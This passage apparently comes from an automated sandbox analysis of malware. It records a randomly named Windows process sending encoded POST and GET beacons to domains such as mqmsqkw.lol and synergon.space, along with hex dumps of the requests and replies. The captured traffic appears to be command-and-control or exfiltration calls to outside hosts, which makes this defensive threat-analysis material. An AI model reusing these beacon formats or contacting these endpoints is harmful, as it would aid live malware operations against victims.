                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xurewf%2FhOTekxTY64UIBAE08SJkkBmQxNo09znmMletRL4Wb9BEEkXdbaKmKrKiDb6BA3DBwYkc6UGoZ8vlFsFK5nWuADcdJQWZcsJ7jQUduF35Y%2Bg3KSpgVmupaAjIIw%2Bo%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 89ce847a1a430cbc-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  Data Raw: 66 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 69 6e 77 61 62 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 2f 65 66 64 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: f3<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://coinwab.com/index.php/efdt/">here</a>.</p></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  16192.168.2.449753188.114.97.3801364C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:07:49.702878952 CEST498OUTGET /efdt/?wd98XJp=MALnGsSsCxZXAJsklBHSyvV4Cwt+rIU5CjwRGjorv42b71G2YZGZ8sEfFWk4L2DJaggYN2F6bElJhaqiOt+r3C6w5v7JMVR/VQKh9hDc+/lVPZE+6qMMIlI=&2hZdq=H6f4R HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Host: www.coinwab.com
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Jul 2, 2024 14:07:50.340125084 CEST1184INHTTP/1.1 301 Moved Permanently
                                                  Date: Tue, 02 Jul 2024 12:07:50 GMT
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  location: https://coinwab.com/index.php/efdt/?wd98XJp=MALnGsSsCxZXAJsklBHSyvV4Cwt+rIU5CjwRGjorv42b71G2YZGZ8sEfFWk4L2DJaggYN2F6bElJhaqiOt+r3C6w5v7JMVR/VQKh9hDc+/lVPZE+6qMMIlI=&2hZdq=H6f4R
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zM6tPekft8eHGGTiCcW6R4WDsmH0BHN05xQLOv5JCCxuzUw7sO5pRcLLSNuMNDa%2BS5%2FUxpANEPSN7wi4yevGZqJLc7N7igX9pG1HETQPiFf4aaLJtseAvKnj5D2Yy%2BX2%2B4Y%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 89ce848a2b0cc334-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  Data Raw: 31 38 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 69 6e 77 61 62 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 2f 65 66 64 74 2f 3f 77 64 39 38 58 4a 70 3d 4d 41 4c 6e 47 73 53 73 43 78 5a 58 41 4a 73 6b 6c 42 48 53 79 76 56 34 43 77 74 2b 72 49 55 35 43 6a 77 52 47 6a 6f 72 76 34 32 62 37 31 47 32 59 5a 47 5a 38 73 45 66 46 57 6b 34 4c 32 44 4a 61 67 67 59 4e 32 46 36 62 45 6c 4a 68 61 71 69 4f 74 2b 72 33 43 36 77 35 76 37 4a 4d 56 52 2f 56 51 4b 68 39 68 44 63 2b 2f 6c 56 50 5a 45 2b [TRUNCATED]
                                                  Data Ascii: 184<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://coinwab.com/index.php/efdt/?wd98XJp=MALnGsSsCxZXAJsklBHSyvV4Cwt+rIU5CjwRGjorv42b71G2YZGZ8sEfFWk4L2DJaggYN2F6bElJhaqiOt+r3C6w5v7JMVR/VQKh9hDc+/lVPZE+6qMMIlI=&amp;2hZdq=H6f4R">here</a>.</p></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  17192.168.2.449754116.213.43.190801364C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:07:55.738869905 CEST765OUTPOST /pqva/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.mqmsqkw.lol
                                                  Origin: http://www.mqmsqkw.lol
                                                  Referer: http://www.mqmsqkw.lol/pqva/
                                                  Connection: close
                                                  Content-Length: 204
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Raw: 77 64 39 38 58 4a 70 3d 55 49 4f 58 66 34 46 4f 6d 4b 34 6b 53 45 4e 77 41 77 71 32 78 70 30 39 64 68 59 6f 6d 53 73 4f 32 67 56 50 69 36 45 36 75 7a 71 6c 49 79 6d 43 47 2f 78 48 31 6a 6f 41 61 6e 35 79 72 4a 2f 59 5a 6e 61 2b 46 62 6c 51 36 4a 54 39 53 6b 73 76 32 41 31 2f 41 51 57 73 58 41 50 35 47 67 78 51 6f 71 6e 56 51 58 2f 49 4b 64 76 6b 63 46 74 6d 32 6a 64 30 4b 79 30 45 67 76 4b 38 32 4d 65 6f 79 67 4e 4c 45 31 59 32 6a 55 75 55 61 7a 46 39 48 37 54 47 6b 30 68 78 36 30 47 6b 6b 64 61 38 36 4f 48 6f 51 49 6c 39 45 41 42 58 34 61 56 39 63 6d 70 43 73 2b 76 64 4e 64 65 79 41 36 32 6f 57 41 3d 3d
                                                  Data Ascii: wd98XJp=UIOXf4FOmK4kSENwAwq2xp09dhYomSsO2gVPi6E6uzqlIymCG/xH1joAan5yrJ/YZna+FblQ6JT9Sksv2A1/AQWsXAP5GgxQoqnVQX/IKdvkcFtm2jd0Ky0EgvK82MeoygNLE1Y2jUuUazF9H7TGk0hx60Gkkda86OHoQIl9EABX4aV9cmpCs+vdNdeyA62oWA==


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  18192.168.2.449755116.213.43.190801364C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:07:59.523619890 CEST785OUTPOST /pqva/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.mqmsqkw.lol
                                                  Origin: http://www.mqmsqkw.lol
                                                  Referer: http://www.mqmsqkw.lol/pqva/
                                                  Connection: close
                                                  Content-Length: 224
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Raw: 77 64 39 38 58 4a 70 3d 55 49 4f 58 66 34 46 4f 6d 4b 34 6b 55 6b 64 77 47 58 32 32 36 70 30 79 52 42 59 6f 74 79 73 4b 32 67 5a 50 69 34 6f 71 75 42 2b 6c 49 57 69 43 55 75 78 48 79 6a 6f 41 52 48 35 33 32 5a 2b 55 5a 6e 6d 63 46 61 5a 51 36 4b 76 39 53 67 6f 76 31 33 68 38 42 41 57 79 4f 51 50 33 4a 41 78 51 6f 71 6e 56 51 54 66 32 4b 64 33 6b 64 31 39 6d 78 79 64 31 57 69 30 48 32 2f 4b 38 68 38 65 73 79 67 4d 73 45 30 46 5a 6a 51 65 55 61 7a 31 39 4a 50 48 5a 71 30 67 30 33 55 48 76 31 76 58 75 32 63 69 31 49 75 39 78 50 77 30 30 77 38 45 6e 4e 58 49 56 2b 2b 4c 75 51 61 58 47 4e 35 4c 68 4e 49 4f 79 58 39 5a 78 6d 47 41 43 45 6d 31 6a 43 32 33 4f 48 73 49 3d
                                                  Data Ascii: wd98XJp=UIOXf4FOmK4kUkdwGX226p0yRBYotysK2gZPi4oquB+lIWiCUuxHyjoARH532Z+UZnmcFaZQ6Kv9Sgov13h8BAWyOQP3JAxQoqnVQTf2Kd3kd19mxyd1Wi0H2/K8h8esygMsE0FZjQeUaz19JPHZq0g03UHv1vXu2ci1Iu9xPw00w8EnNXIV++LuQaXGN5LhNIOyX9ZxmGACEm1jC23OHsI=


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  19192.168.2.449756116.213.43.190801364C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:08:02.316864967 CEST10867OUTPOST /pqva/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.mqmsqkw.lol
                                                  Origin: http://www.mqmsqkw.lol
                                                  Referer: http://www.mqmsqkw.lol/pqva/
                                                  Connection: close
                                                  Content-Length: 10304
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Raw: 77 64 39 38 58 4a 70 3d 55 49 4f 58 66 34 46 4f 6d 4b 34 6b 55 6b 64 77 47 58 32 32 36 70 30 79 52 42 59 6f 74 79 73 4b 32 67 5a 50 69 34 6f 71 75 42 6d 6c 49 6c 71 43 47 5a 64 48 7a 6a 6f 41 59 6e 35 32 32 5a 2f 4f 5a 6e 4f 59 46 61 55 74 36 50 72 39 41 31 38 76 39 6d 68 38 49 41 57 79 47 77 50 36 47 67 77 59 6f 71 58 52 51 58 7a 32 4b 64 33 6b 64 7a 52 6d 6e 7a 64 31 46 53 30 45 67 76 4b 6f 32 4d 65 55 79 67 56 54 45 30 41 6d 6a 44 57 55 62 54 6c 39 46 63 2f 5a 69 30 67 36 79 55 48 38 31 76 61 77 32 63 2b 35 49 75 67 65 50 7a 6f 30 79 37 68 6c 59 31 49 36 71 65 6a 79 4f 70 6e 39 4a 72 33 36 4c 66 57 4d 48 4e 52 56 37 6d 31 72 49 45 77 61 52 48 58 76 46 4d 36 76 41 48 4c 51 45 4f 6b 51 55 53 4c 72 42 4d 37 50 74 68 6b 33 2b 31 37 49 52 56 6a 52 78 30 5a 64 4f 49 79 35 33 59 69 64 59 7a 55 55 54 6b 38 37 69 48 76 59 2b 38 31 6c 68 6e 4f 6b 55 39 4e 75 4f 42 64 69 62 34 65 48 76 34 43 50 72 76 79 76 41 6b 66 77 6e 50 61 35 42 55 69 61 30 72 2f 45 37 44 52 36 75 61 72 70 39 4c 51 46 44 59 39 61 56 6e [TRUNCATED]
                                                  Data Ascii: wd98XJp=UIOXf4FOmK4kUkdwGX226p0yRBYotysK2gZPi4oquBmlIlqCGZdHzjoAYn522Z/OZnOYFaUt6Pr9A18v9mh8IAWyGwP6GgwYoqXRQXz2Kd3kdzRmnzd1FS0EgvKo2MeUygVTE0AmjDWUbTl9Fc/Zi0g6yUH81vaw2c+5IugePzo0y7hlY1I6qejyOpn9Jr36LfWMHNRV7m1rIEwaRHXvFM6vAHLQEOkQUSLrBM7Pthk3+17IRVjRx0ZdOIy53YidYzUUTk87iHvY+81lhnOkU9NuOBdib4eHv4CPrvyvAkfwnPa5BUia0r/E7DR6uarp9LQFDY9aVnzFVh4mc6IftrI557caCQnPY0hmCvi1GXMJYY88ugxA55NxcYP+hhO1ciDfim8iQC4MHS0CxUaJUKc3Rj6uiPSKLAs/qlKHJmU5ZelxuNrhTfmNGM9KwPwhTfNypTEr0EKF4G9hnlNdwASHh0jfvMI/kvOBo+YupyaLBXbuDb+3qyVmxF8U8lth196y16YoLff9AJhecBQ7mjqQGG/XeSWSYlxXg+ZCMT2bkjCGKhy1e934YYULNhcsioIbVQs7EKLEdeTZ0/77gwMnpo2oqQQQTsfV6ZKKptMDBxLASnXU/ubApCVaMxAq8EbJFg1lI+Zt8/eT9+W+slcfqWzgRmtT2lHuPV481yuorgSO9xPaKZ8rYsSGABKHTqdpe/Awa05mB0K+7Tg+LV9iro3KEw/gP1ZGCoI3sr4hnARgwQQ9jR+RgOKlRkVQ0ycAgTjDH0vdHpn/n4RqJEOaqJT2mOm2Lv055mO2v6f45PcB1zIMCimc6FhuThKKW37Pr3BO3IgTdWaZC01GaPXASJa0OVFQ3UohIGohh93VKMMIF0N3dmO3INemF7IQPjTUZBvYPCJ3poXWcLM7gicYXFVcpXH9T/4AG8iy5uVlJKuFbJi1jSboPjjhK+pFx2t8C1YOj9htDsnDYVWMpxVJKYUCvZzonMU6LyLbBQuJ [TRUNCATED]


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  20192.168.2.449757116.213.43.190801364C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:08:04.861583948 CEST498OUTGET /pqva/?wd98XJp=ZKm3cPRqjLICFiRrATX7oY0MbRIIvi8qgjtP/vsOoinDFUrpWf4t7wcwUBRK5t7Qc0H9b4lf1rTESW8G/Q5oJQ2SGD/5MgBfv+zXfj20S4XoQgB8oyIQXRQ=&2hZdq=H6f4R HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Host: www.mqmsqkw.lol
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  21192.168.2.449758109.95.158.127801364C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:08:31.344521999 CEST774OUTPOST /zgi4/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.synergon.space
                                                  Origin: http://www.synergon.space
                                                  Referer: http://www.synergon.space/zgi4/
                                                  Connection: close
                                                  Content-Length: 204
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Raw: 77 64 39 38 58 4a 70 3d 4d 74 55 32 4d 43 74 4d 4b 61 66 4c 79 79 79 76 53 64 4b 42 34 6d 6a 6f 66 49 31 69 38 42 51 51 44 44 79 47 6f 2b 6a 61 6f 63 51 51 79 65 66 77 6f 55 37 4b 37 57 65 4e 49 71 79 52 6a 56 7a 6a 37 45 54 45 62 56 4b 4a 67 6b 4f 50 6f 74 61 51 36 2f 68 48 78 63 66 51 36 4a 7a 6b 2f 33 6d 34 73 54 62 65 62 52 4d 34 5a 50 59 6e 51 49 4e 30 72 65 41 79 76 39 66 41 71 6f 32 6b 70 5a 49 54 69 76 33 78 58 67 30 73 76 73 69 54 2b 46 43 50 2f 53 4d 72 58 42 50 4e 68 6a 69 55 65 61 4e 46 4c 72 2b 77 56 71 4c 31 6e 46 2f 47 31 4c 69 68 6e 44 2f 45 6c 34 66 64 6a 38 46 41 75 6f 74 38 33 51 3d 3d
                                                  Data Ascii: wd98XJp=MtU2MCtMKafLyyyvSdKB4mjofI1i8BQQDDyGo+jaocQQyefwoU7K7WeNIqyRjVzj7ETEbVKJgkOPotaQ6/hHxcfQ6Jzk/3m4sTbebRM4ZPYnQIN0reAyv9fAqo2kpZITiv3xXg0svsiT+FCP/SMrXBPNhjiUeaNFLr+wVqL1nF/G1LihnD/El4fdj8FAuot83Q==
                                                  Jul 2, 2024 14:08:32.013422012 CEST1043INHTTP/1.1 404 Not Found
                                                  Connection: close
                                                  x-powered-by: PHP/5.6.40
                                                  content-type: text/html; charset=UTF-8
                                                  content-length: 810
                                                  content-encoding: br
                                                  vary: Accept-Encoding
                                                  date: Tue, 02 Jul 2024 12:08:31 GMT
                                                  server: LiteSpeed
                                                  Data Raw: c2 18 01 80 5c 3a ad 5e 33 2a fa 1d 7b ae 23 c8 f8 22 b6 f9 58 a6 54 2f 68 01 11 24 46 5a 07 b8 b9 aa f8 a2 fc fa db af d2 f4 fb cd 10 12 21 d1 e2 b3 84 6a fa 44 48 66 cf 70 4f 44 b5 eb 1c a1 30 89 4b 75 9e 17 17 17 f7 90 4d df 4d e4 1b a7 cc 91 cc 1d 64 1e 25 03 50 06 cd 54 a2 59 af 5a 72 30 c8 e3 d0 42 fd 72 07 58 ca e6 e1 e1 61 c1 08 db 3a 0d 36 30 34 0d 2b 73 18 37 12 7f 8b 01 ff 54 85 cb a6 e8 8b 0f 19 55 8b 3e 10 1f 2c b8 58 5a de e4 8b 23 b7 ea f9 08 dd ba c0 c6 36 c9 34 3c 82 fa 3d 45 4e 56 65 de 68 41 78 d7 a9 4f ae 74 ec 9b d4 70 00 b0 46 60 bc 00 f4 46 36 3c 50 41 e3 3f 81 18 26 a7 81 e7 11 50 7b 0a 34 82 35 04 8b c5 4e 1f 3b 82 60 fe fd 80 ff bf 51 93 85 40 fe 6c 02 7c ff fe dd 24 a4 7c f4 0f 49 81 f9 60 6c 1f 01 e6 27 13 0c 93 7e 94 a2 76 96 73 d8 64 d3 05 4e e4 35 5a 8c 20 d0 78 77 52 14 e0 7b d5 7a bb dd ee a4 60 ba 70 ec ed f4 80 0d 78 0f 29 9e a4 30 63 f3 28 45 8d 62 25 57 d3 e5 96 67 60 de ba 13 f9 08 30 c7 8a cd 89 1e 81 aa 53 4a 11 7f 84 90 4f 68 cd 9e 42 45 aa 06 66 17 9e a4 58 [TRUNCATED]
                                                  Data Ascii: \:^3*{#"XT/h$FZ!jDHfpOD0KuMMd%PTYZr0BrXa:604+s7TU>,XZ#64<=ENVehAxOtpF`F6<PA?&P{45N;`Q@l|$|I`l'~vsdN5Z xwR{z`px)0c(Eb%Wg`0SJOhBEfXUQ[un468f'YhoJ">)ZzP(WDr&Z'lLe*[H,Ei=qEk4'Ci8BOp>CtpK)D@laRepMx@j`xVH!D|Nl7&a2G<gzrjA%X$D*k(b8}O)K3e.{AIdZ_T$T^h>B,cOZ6rB}Qbmcg"-RYbxghvli"F9[)FOXp,j~=uq}F)F_-QS6qiPH


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  22192.168.2.449759109.95.158.127801364C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:08:33.882411003 CEST794OUTPOST /zgi4/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.synergon.space
                                                  Origin: http://www.synergon.space
                                                  Referer: http://www.synergon.space/zgi4/
                                                  Connection: close
                                                  Content-Length: 224
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Raw: 77 64 39 38 58 4a 70 3d 4d 74 55 32 4d 43 74 4d 4b 61 66 4c 79 57 32 76 51 37 43 42 74 57 6a 70 61 49 31 69 79 52 51 55 44 44 32 47 6f 2f 33 77 6f 70 41 51 7a 37 37 77 70 56 37 4b 36 57 65 4e 63 61 79 55 6e 56 7a 6f 37 45 4f 33 62 55 61 4a 67 6c 75 50 6f 70 65 51 35 4f 68 45 6a 38 66 53 38 4a 7a 31 79 58 6d 34 73 54 62 65 62 52 6f 65 5a 50 51 6e 51 34 64 30 36 50 41 7a 78 4e 66 42 36 59 32 6b 6a 35 49 49 69 76 32 53 58 6c 64 4c 76 70 6d 54 2b 45 79 50 2b 47 51 6f 41 52 50 50 38 7a 6a 42 4f 37 30 4a 52 4c 65 36 4b 70 7a 48 70 48 47 6b 39 74 7a 37 32 79 65 54 33 34 37 75 2b 37 4d 30 6a 72 51 31 73 66 51 2b 7a 39 74 49 54 46 62 6c 39 39 6e 75 74 48 45 61 39 57 4d 3d
                                                  Data Ascii: wd98XJp=MtU2MCtMKafLyW2vQ7CBtWjpaI1iyRQUDD2Go/3wopAQz77wpV7K6WeNcayUnVzo7EO3bUaJgluPopeQ5OhEj8fS8Jz1yXm4sTbebRoeZPQnQ4d06PAzxNfB6Y2kj5IIiv2SXldLvpmT+EyP+GQoARPP8zjBO70JRLe6KpzHpHGk9tz72yeT347u+7M0jrQ1sfQ+z9tITFbl99nutHEa9WM=
                                                  Jul 2, 2024 14:08:34.557420969 CEST1043INHTTP/1.1 404 Not Found
                                                  Connection: close
                                                  x-powered-by: PHP/5.6.40
                                                  content-type: text/html; charset=UTF-8
                                                  content-length: 810
                                                  content-encoding: br
                                                  vary: Accept-Encoding
                                                  date: Tue, 02 Jul 2024 12:08:34 GMT
                                                  server: LiteSpeed
                                                  Data Raw: c2 18 01 80 5c 3a ad 5e 33 2a fa 1d 7b ae 23 c8 f8 22 b6 f9 58 a6 54 2f 68 01 11 24 46 5a 07 b8 b9 aa f8 a2 fc fa db af d2 f4 fb cd 10 12 21 d1 e2 b3 84 6a fa 44 48 66 cf 70 4f 44 b5 eb 1c a1 30 89 4b 75 9e 17 17 17 f7 90 4d df 4d e4 1b a7 cc 91 cc 1d 64 1e 25 03 50 06 cd 54 a2 59 af 5a 72 30 c8 e3 d0 42 fd 72 07 58 ca e6 e1 e1 61 c1 08 db 3a 0d 36 30 34 0d 2b 73 18 37 12 7f 8b 01 ff 54 85 cb a6 e8 8b 0f 19 55 8b 3e 10 1f 2c b8 58 5a de e4 8b 23 b7 ea f9 08 dd ba c0 c6 36 c9 34 3c 82 fa 3d 45 4e 56 65 de 68 41 78 d7 a9 4f ae 74 ec 9b d4 70 00 b0 46 60 bc 00 f4 46 36 3c 50 41 e3 3f 81 18 26 a7 81 e7 11 50 7b 0a 34 82 35 04 8b c5 4e 1f 3b 82 60 fe fd 80 ff bf 51 93 85 40 fe 6c 02 7c ff fe dd 24 a4 7c f4 0f 49 81 f9 60 6c 1f 01 e6 27 13 0c 93 7e 94 a2 76 96 73 d8 64 d3 05 4e e4 35 5a 8c 20 d0 78 77 52 14 e0 7b d5 7a bb dd ee a4 60 ba 70 ec ed f4 80 0d 78 0f 29 9e a4 30 63 f3 28 45 8d 62 25 57 d3 e5 96 67 60 de ba 13 f9 08 30 c7 8a cd 89 1e 81 aa 53 4a 11 7f 84 90 4f 68 cd 9e 42 45 aa 06 66 17 9e a4 58 [TRUNCATED]
                                                  Data Ascii: \:^3*{#"XT/h$FZ!jDHfpOD0KuMMd%PTYZr0BrXa:604+s7TU>,XZ#64<=ENVehAxOtpF`F6<PA?&P{45N;`Q@l|$|I`l'~vsdN5Z xwR{z`px)0c(Eb%Wg`0SJOhBEfXUQ[un468f'YhoJ">)ZzP(WDr&Z'lLe*[H,Ei=qEk4'Ci8BOp>CtpK)D@laRepMx@j`xVH!D|Nl7&a2G<gzrjA%X$D*k(b8}O)K3e.{AIdZ_T$T^h>B,cOZ6rB}Qbmcg"-RYbxghvli"F9[)FOXp,j~=uq}F)F_-QS6qiPH


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  23192.168.2.449760109.95.158.127801364C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:08:36.473138094 CEST10876OUTPOST /zgi4/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.synergon.space
                                                  Origin: http://www.synergon.space
                                                  Referer: http://www.synergon.space/zgi4/
                                                  Connection: close
                                                  Content-Length: 10304
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
